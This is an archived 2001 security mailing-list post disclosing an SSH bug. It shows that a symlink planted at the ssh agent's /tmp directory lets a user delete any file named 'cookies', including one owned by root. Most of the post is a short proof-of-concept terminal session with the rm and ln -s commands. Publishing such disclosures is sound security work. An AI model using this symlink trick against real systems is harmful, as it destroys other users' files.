SSH allows deletion of other users files. ========================================= You can delete any file on the filesystem you want... as long as its called cookies. Not really a very useful bug, but could cause annoyances to people who actually like their cookies. /home/zen/.netscape/cookies sample exploit:- [root@clarity /root]# touch /cookies;ls /cookies /cookies [root@clarity /root]# ssh zen@localhost zen@localhost's password: Last login: Mon Jun 4 20:22:39 2001 from localhost.local Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 [zen@clarity zen]$ logout Connection to localhost closed. [root@clarity /root]# ls /cookies /bin/ls: /cookies: No such file or directory --zen-parse
This archive was generated by hypermail 2b30 : Mon Jun 04 2001 - 08:19:22 PDT